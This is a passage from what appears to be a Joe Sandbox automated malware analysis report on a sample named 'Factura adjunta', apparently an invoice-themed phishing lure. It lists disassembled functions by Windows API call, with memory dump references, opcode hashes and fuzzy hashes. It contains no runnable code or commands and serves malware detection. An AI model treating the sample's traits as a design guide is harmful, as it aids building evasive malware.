                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: Process$CloseCreateCurrentHandleLogonOpenTokenWith
                            • String ID:
                            • API String ID: 2621361867-0
                            • Opcode ID: c078fe6c5b1b1158efbeb808ac431167737ac4037fcaf06d3ecfac71c36bd3f6
                            • Instruction ID: abefaf986e7a81019e287949cc9ef9454cf5e16736689afde6f68c02057f1f17
                            • Opcode Fuzzy Hash: c078fe6c5b1b1158efbeb808ac431167737ac4037fcaf06d3ecfac71c36bd3f6
                            • Instruction Fuzzy Hash: 87114AB250124DEBDF018FA8DD49FDA7BA9FF48314F044065FA44A21A1C7758D609BA0
                            Function 0082667C Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 007B5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00817B20,?,?,00000000), ref: 007B5B8C
                              • Part of subcall function 007B5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00817B20,?,?,00000000,?,?), ref: 007B5BB0
                            • gethostbyname.WS2_32(?), ref: 008266AC
                            • WSAGetLastError.WS2_32(00000000), ref: 008266B7
                            • _memmove.LIBCMT ref: 008266E4
                            • inet_ntoa.WS2_32(?), ref: 008266EF
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                            • String ID:
                            • API String ID: 1504782959-0
                            • Opcode ID: 250be02f8c3b3692301ca1ef04e38264b9720abc09c3dfd14ae45451bea88981
                            • Instruction ID: 288fe4298f2174787a902f6aa8d439e79eebc97efc63e09ed783b3f0c0d3e83b
                            • Opcode Fuzzy Hash: 250be02f8c3b3692301ca1ef04e38264b9720abc09c3dfd14ae45451bea88981
                            • Instruction Fuzzy Hash: 9D113D75900509EBCB04FBA4D98AEEE77B8FF44310B144565F602E7262EB34AE548BA1
                            Function 00809023 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON
                            Download Yara Rule
                            APIs
                            • SendMessageW.USER32(?,000000B0,?,?), ref: 00809043
                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00809055
                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0080906B
                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00809086
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: MessageSend
                            • String ID:
                            • API String ID: 3850602802-0
                            • Opcode ID: f4cf16b871edc3f49971e91e6d619a34d1866ba4606022a264b2b30355c21f8f
                            • Instruction ID: 155f9e9c4f819db8796856bce0ca397dbeb88e16893d695626a5c1a7b10267fd
                            • Opcode Fuzzy Hash: f4cf16b871edc3f49971e91e6d619a34d1866ba4606022a264b2b30355c21f8f
                            • Instruction Fuzzy Hash: 03115E79901218FFEB10DFA5CD85E9DFBB4FB48310F204095EA44B7291D6716E10DB90
                            Function 00811652 Relevance: 6.1, APIs: 4, Instructions: 51sleepCOMMON
                            Download Yara Rule
                            APIs
                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,008101FD,?,00811250,?,00008000), ref: 0081166F
                            • Sleep.KERNEL32(00000000,?,?,?,?,?,?,008101FD,?,00811250,?,00008000), ref: 00811694
                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,008101FD,?,00811250,?,00008000), ref: 0081169E
                            • Sleep.KERNEL32(?,?,?,?,?,?,?,008101FD,?,00811250,?,00008000), ref: 008116D1
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: CounterPerformanceQuerySleep
                            • String ID:
                            • API String ID: 2875609808-0
                            • Opcode ID: 0c0fe37a5b8a0c892aa959a934ae71199b631643450989b5c5ef9e598b45e3bd
                            • Instruction ID: dd64787101fe9ad4e69015e50afc87ff78a1a98c6c381f2bc09135139e250b57
                            • Opcode Fuzzy Hash: 0c0fe37a5b8a0c892aa959a934ae71199b631643450989b5c5ef9e598b45e3bd
                            • Instruction Fuzzy Hash: 0C117C31C0552DDBCF009FA5E848AEEBB7CFF59751F054459EA80F6240CB3159A08BD6
                            Function 007E7207 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                            • String ID:
                            • API String ID: 3016257755-0
                            • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                            • Instruction ID: d9b44f72cc9fb71e3d72e6a5fbda58656db30b77d7e6a70087c5df09e4675184
                            • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                            • Instruction Fuzzy Hash: 67017E3204518AFBCF1A5E85DC058EE3F36BF1D340B488515FA1898031C23AC9B1EB81
                            Function 0083B57F Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                            Download Yara Rule
                            APIs
                            • GetWindowRect.USER32(?,?), ref: 0083B59E
                            • ScreenToClient.USER32(?,?), ref: 0083B5B6
                            • ScreenToClient.USER32(?,?), ref: 0083B5DA
                            • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0083B5F5
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: ClientRectScreen$InvalidateWindow
                            • String ID:
                            • API String ID: 357397906-0
                            • Opcode ID: 23d9bad3e3c65f3ba7e99bd4411f25e56e3940070b6288f3c3950151185c192a
                            • Instruction ID: 0499373f638b6dd34fabf8352e642d17153df14c1595e673cfb4243f7774f1a5
                            • Opcode Fuzzy Hash: 23d9bad3e3c65f3ba7e99bd4411f25e56e3940070b6288f3c3950151185c192a
                            • Instruction Fuzzy Hash: 501146B5D00209EFDB41DF99C4459EEFBB5FB58310F104166E914E3220D735AA558F90
                            Function 0083B8EF Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON
                            Download Yara Rule
                            APIs
                            • _memset.LIBCMT ref: 0083B8FE
                            • _memset.LIBCMT ref: 0083B90D
                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00877F20,00877F64), ref: 0083B93C
                            • CloseHandle.KERNEL32 ref: 0083B94E
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: _memset$CloseCreateHandleProcess
                            • String ID:
                            • API String ID: 3277943733-0
                            • Opcode ID: 280e41de0ce73a35d3424074b4870e8834688d1911b9e7b0544ec3cb1d14741e
                            • Instruction ID: 06216fc0d1bc59645e64cc76d1738c3e1775b00e2d5cb5852f17c3e389f29579
                            • Opcode Fuzzy Hash: 280e41de0ce73a35d3424074b4870e8834688d1911b9e7b0544ec3cb1d14741e
                            • Instruction Fuzzy Hash: 7BF05EB2544300BBE2102B61AD0AFBB3A5CFB09354F004421FB0CD6296DB758940C7A9
                            Function 00816E7C Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                            Download Yara Rule
                            APIs
                            • RtlEnterCriticalSection.NTDLL(?), ref: 00816E88
                              • Part of subcall function 0081794E: _memset.LIBCMT ref: 00817983
                            • _memmove.LIBCMT ref: 00816EAB
                            • _memset.LIBCMT ref: 00816EB8
                            • RtlLeaveCriticalSection.NTDLL(?), ref: 00816EC8
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: CriticalSection_memset$EnterLeave_memmove
                            • String ID:
                            • API String ID: 48991266-0
                            • Opcode ID: 4aedda18aa7a98d8f10929598614149aae6827aa9ca78e4b7b77b7e8d0e81e84
                            • Instruction ID: e1c165ee8999aeb94e1f7ce0f6a283ae57de4af1aa530a1714c99c3863f41ef0
                            • Opcode Fuzzy Hash: 4aedda18aa7a98d8f10929598614149aae6827aa9ca78e4b7b77b7e8d0e81e84
                            • Instruction Fuzzy Hash: E1F0547A504200FBCF016F55DC85E8ABB2AFF45321B04C065FE089E217C775A951CBB5
                            Function 0083C00C Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 007B12F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 007B134D
                              • Part of subcall function 007B12F3: SelectObject.GDI32(?,00000000), ref: 007B135C
                              • Part of subcall function 007B12F3: BeginPath.GDI32(?), ref: 007B1373
                              • Part of subcall function 007B12F3: SelectObject.GDI32(?,00000000), ref: 007B139C
                            • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0083C030
                            • LineTo.GDI32(00000000,?,?), ref: 0083C03D
                            • EndPath.GDI32(00000000), ref: 0083C04D
                            • StrokePath.GDI32(00000000), ref: 0083C05B
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                            • String ID:
                            • API String ID: 1539411459-0
                            • Opcode ID: 76eb08d5d2d8c09f863775036fc27c17560daa42b49e2b95778459dad2cee319
                            • Instruction ID: b4ed15de6825db65c2445d62595c9b0737cb15805a63ad9b97081e655a4246d3
                            • Opcode Fuzzy Hash: 76eb08d5d2d8c09f863775036fc27c17560daa42b49e2b95778459dad2cee319
                            • Instruction Fuzzy Hash: A5F03432405A59BBDB266F58AC0EFCE3B99BF46311F044010FB25650E287B956A1CFE6
                            Function 0080A37C Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON
                            Download Yara Rule
                            APIs
                            • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0080A399
                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 0080A3AC
                            • GetCurrentThreadId.KERNEL32 ref: 0080A3B3
                            • AttachThreadInput.USER32(00000000), ref: 0080A3BA
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                            • String ID:
                            • API String ID: 2710830443-0
                            • Opcode ID: 7a0981784ec9f7909684b8f8dc31c018ae62de8119721948e330793b1151762f
                            • Instruction ID: 5774044789b431daba1b9a6661bc727a936d6c1eff8614d0c3cee0248a5aec91
                            • Opcode Fuzzy Hash: 7a0981784ec9f7909684b8f8dc31c018ae62de8119721948e330793b1151762f
                            • Instruction Fuzzy Hash: 5FE03931941328BBEB201BA2DC0DEDB3F1CFF267A1F008424F609C40A1D6758540CBE0
                            Function 007B2218 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                            Download Yara Rule
                            APIs
                            • GetSysColor.USER32(00000008), ref: 007B2231
                            • SetTextColor.GDI32(?,000000FF), ref: 007B223B
                            • SetBkMode.GDI32(?,00000001), ref: 007B2250
                            • GetStockObject.GDI32(00000005), ref: 007B2258
                            • GetWindowDC.USER32(?,00000000), ref: 007EC0D3
                            • GetPixel.GDI32(00000000,00000000,00000000), ref: 007EC0E0
                            • GetPixel.GDI32(00000000,?,00000000), ref: 007EC0F9
                            • GetPixel.GDI32(00000000,00000000,?), ref: 007EC112
                            • GetPixel.GDI32(00000000,?,?), ref: 007EC132
                            • ReleaseDC.USER32(?,00000000), ref: 007EC13D
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                            • String ID:
                            • API String ID: 1946975507-0
                            • Opcode ID: 4a0c7db9967b78a00a4cdbd3fd6bb75900b24d27911aa9f4756989d9abe9c068
                            • Instruction ID: 537be3e26647d1ceac8460f685a34e5aedcd2f083c9b0dc65331960da446fc38
                            • Opcode Fuzzy Hash: 4a0c7db9967b78a00a4cdbd3fd6bb75900b24d27911aa9f4756989d9abe9c068
                            • Instruction Fuzzy Hash: E4E03932900284EADF225F68FC0DBD83B10BB85332F008366FB69880E287714981DB51
                            Function 00808C5A Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON
                            Download Yara Rule
                            APIs
                            • GetCurrentThread.KERNEL32 ref: 00808C63
                            • OpenThreadToken.ADVAPI32(00000000,?,?,?,0080882E), ref: 00808C6A
                            • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,0080882E), ref: 00808C77
                            • OpenProcessToken.ADVAPI32(00000000,?,?,?,0080882E), ref: 00808C7E
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: CurrentOpenProcessThreadToken
                            • String ID:
                            • API String ID: 3974789173-0
                            • Opcode ID: d759fa07255971ba6d99e4883a3aa08a0f7d07bf7938b69a0231157ddcc5f4d1
                            • Instruction ID: 87ca13095b54ea6b8e3ed29f001cf541d2dd09f08f022731cd51b5946491c373
                            • Opcode Fuzzy Hash: d759fa07255971ba6d99e4883a3aa08a0f7d07bf7938b69a0231157ddcc5f4d1
                            • Instruction Fuzzy Hash: F8E08636A42221DBEB605FB56E0CB573BBCFF90792F044C29B385C9091DB388481CBA1
                            Function 007F2187 Relevance: 6.0, APIs: 4, Instructions: 20COMMON
                            Download Yara Rule
                            APIs
                            • GetDesktopWindow.USER32 ref: 007F2187
                            • GetDC.USER32(00000000), ref: 007F2191
                            • GetDeviceCaps.GDI32(00000000,0000000C), ref: 007F21B1
                            • ReleaseDC.USER32(?), ref: 007F21D2
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: CapsDesktopDeviceReleaseWindow
                            • String ID:
                            • API String ID: 2889604237-0
                            • Opcode ID: 4ca6d702b1f004bf6991111a8c1f87f5f41995232d0d7ad888c64c4f03541c6f
                            • Instruction ID: ae12a6ac6f19b9fe5853a865530265fe92faa5d6b941a9c3bb2896c570a4a51c
                            • Opcode Fuzzy Hash: 4ca6d702b1f004bf6991111a8c1f87f5f41995232d0d7ad888c64c4f03541c6f
                            • Instruction Fuzzy Hash: 4AE0E575800608EFDB019FA0C809AAD7BB1FB9C350F108825FA5AA7222DB7881429F80
                            Function 007F219B Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                            Download Yara Rule
                            APIs
                            • GetDesktopWindow.USER32 ref: 007F219B
                            • GetDC.USER32(00000000), ref: 007F21A5
                            • GetDeviceCaps.GDI32(00000000,0000000C), ref: 007F21B1
                            • ReleaseDC.USER32(?), ref: 007F21D2
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: CapsDesktopDeviceReleaseWindow
                            • String ID:
                            • API String ID: 2889604237-0
                            • Opcode ID: 5bb4aa62b21bc539f9e04536091677ac183d1d707e7f72ce9f909ab00bcbdd6a
                            • Instruction ID: abe9ac617ab455de1b5a52e82ee6a777716a33c9477bb3840661d5013dc6df24
                            • Opcode Fuzzy Hash: 5bb4aa62b21bc539f9e04536091677ac183d1d707e7f72ce9f909ab00bcbdd6a
                            • Instruction Fuzzy Hash: 2BE01A75C00204EFCB019F70C809A9D7BF1FB9C310F108825FA5AA7221DB789141DF80
                            Function 00829A72 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 242COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00807652: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0080758C,80070057,?,?), ref: 00807698
                            • _memset.LIBCMT ref: 00829B28
                            • _memset.LIBCMT ref: 00829C6B
                            Strings
                            • NULL Pointer assignment, xrefs: 00829CF0
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: _memset$lstrcmpi
                            • String ID: NULL Pointer assignment
                            • API String ID: 1020867613-2785691316
                            • Opcode ID: f3bae7fd51f63d9eddab65df4668f688b21fff5b8e8a049149c5722992f0dada
                            • Instruction ID: 57d3cd0001b98d1e39d8e6c5bfa726b6808fb6a11c9eeb68fd5dd170d32200b7
                            • Opcode Fuzzy Hash: f3bae7fd51f63d9eddab65df4668f688b21fff5b8e8a049149c5722992f0dada
